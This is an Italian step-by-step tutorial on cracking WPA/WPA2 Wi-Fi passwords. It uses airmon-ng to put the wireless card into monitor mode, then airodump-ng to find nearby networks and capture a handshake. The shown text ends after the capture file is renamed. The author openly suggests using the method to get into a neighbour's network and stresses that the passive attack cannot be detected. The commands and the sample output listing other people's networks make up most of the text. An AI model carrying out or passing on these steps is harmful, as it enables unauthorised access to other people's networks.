
Decifra i router Wi-Fi WPA/WPA2 con Airodump-ng e Aircrack-ng/Hashcat
Cracka router Wi-Fi WPA/WPA2 con Airodump-ng e Aircrack-ng/Hashcat.
Questo è un breve tutorial illustrativo che mostra come violare reti Wi-Fi protette con password deboli. Non è esaustivo, ma dovrebbe fornire informazioni sufficienti per testare la sicurezza della propria rete o per intrufolarsi in una vicina. L'attacco descritto di seguito è completamente passivo (solo ascolto, niente viene trasmesso dal tuo computer) ed è impossibile da individuare a patto che non utilizzi effettivamente la password che hai violato. Un attacco attivo opzionale di deautenticazione può essere usato per accelerare il processo di ricognizione ed è descritto alla fine di questo documento.
Se hai familiarità con questo processo, puoi saltare le descrizioni e passare direttamente all'elenco dei comandi in fondo. Per una varietà di suggerimenti e metodi alternativi, vedi l'appendice. neal1991 e tiiime hanno gentilmente fornito traduzioni di questo documento e dell'appendice in cinese, se preferisci quelle versioni.
DICHIARAZIONE DI NON RESPONSABILITÀ: Questo software/tutorial è solo a scopo educativo. Non dovrebbe essere utilizzato per attività illegali. L'autore non è responsabile per il suo uso. Non fare lo stronzo.
Questo tutorial presuppone che tu:
sudo apt-get install aircrack-ngInizia elencando le interfacce wireless che supportano la modalità monitor con:
airmon-ng
Se non vedi alcuna interfaccia elencata, la tua scheda wireless non supporta la modalità monitor 😞
Assumeremo che il nome della tua interfaccia wireless sia wlan0, ma assicurati di usare il nome corretto se differisce. Successivamente, mettiamo l'interfaccia in modalità monitor:
airmon-ng start wlan0
Esegui iwconfig. Ora dovresti vedere una nuova interfaccia in modalità monitor elencata (probabilmente mon0 o wlan0mon).
Inizia ad ascoltare i Beacon frame 802.11 trasmessi dai router wireless vicini usando la tua interfaccia monitor:
airodump-ng mon0
Dovresti vedere un output simile a quello sotto.
CH 13 ][ Elapsed: 52 s ][ 2017-07-23 15:49
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
14:91:82:F7:52:EB -66 205 26 0 1 54e OPN belkin.2e8.guests
14:91:82:F7:52:E8 -64 212 56 0 1 54e WPA2 CCMP PSK belkin.2e8
14:22:DB:1A:DB:64 -81 44 7 0 1 54 WPA2 CCMP <length: 0>
14:22:DB:1A:DB:66 -83 48 0 0 1 54e. WPA2 CCMP PSK steveserro
9C:5C:8E:C9:AB:C0 -81 19 0 0 3 54e WPA2 CCMP PSK hackme
00:23:69:AD:AF:94 -82 350 4 0 1 54e WPA2 CCMP PSK Kaitlin's Awesome
06:26:BB:75:ED:69 -84 232 0 0 1 54e. WPA2 CCMP PSK HH2
78:71:9C:99:67:D0 -82 339 0 0 1 54e. WPA2 CCMP PSK ARRIS-67D2
9C:34:26:9F:2E:E8 -85 40 0 0 1 54e. WPA2 CCMP PSK Comcast_2EEA-EXT
BC:EE:7B:8F:48:28 -85 119 10 0 1 54e WPA2 CCMP PSK root
EC:1A:59:36:AD:CA -86 210 28 0 1 54e WPA2 CCMP PSK belkin.dca
Ai fini di questa demo, sceglieremo di violare la password della mia rete "hackme". Ricorda l'indirizzo MAC BSSID e il numero del canale (CH) come mostrato da airodump-ng, poiché ci serviranno entrambi per il passaggio successivo.
WPA/WPA2 utilizza un handshake a 4 vie per autenticare i dispositivi alla rete. Non devi sapere cosa significhi, ma devi catturare uno di questi handshake per poter violare la password di rete. Questi handshake avvengono ogni volta che un dispositivo si connette alla rete, ad esempio quando il tuo vicino torna a casa dal lavoro. Catturiamo questo handshake dirigendo airmon-ng a monitorare il traffico sulla rete target usando i valori del canale e del bssid scoperti dal comando precedente.
# sostituisci i valori di -c e --bssid con quelli della tua rete target
# -w specifica la directory dove salvare la cattura dei pacchetti
airodump-ng -c 3 --bssid 9C:5C:8E:C9:AB:C0 -w . mon0
CH 6 ][ Elapsed: 1 min ][ 2017-07-23 16:09 ]
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
9C:5C:8E:C9:AB:C0 -47 0 140 0 0 6 54e WPA2 CCMP PSK ASUS
Ora aspettiamo... Una volta catturato un handshake, dovresti vedere qualcosa come [ WPA handshake: bc:d3:c9:ef:d2:67 in alto a destra dello schermo, appena a destra dell'ora corrente.
Se sei impaziente e ti senti a tuo agio nell'usare un attacco attivo, puoi forzare i dispositivi connessi alla rete target a riconnettersi, inviando loro pacchetti di deautenticazione malevoli. Questo spesso porta alla cattura di un handshake a 4 vie. Vedi la sezione sull'attacco deauth qui sotto per informazioni.
Una volta catturato un handshake, premi ctrl-c per uscire da airodump-ng. Dovresti vedere un file .cap nella directory in cui hai detto a airodump-ng di salvare la cattura (probabilmente chiamato -01.cap). Useremo questo file di cattura per violare la password di rete. Mi piace rinominare questo file per riflettere il nome della rete che stiamo cercando di violare:
mv ./-01.cap hackme.cap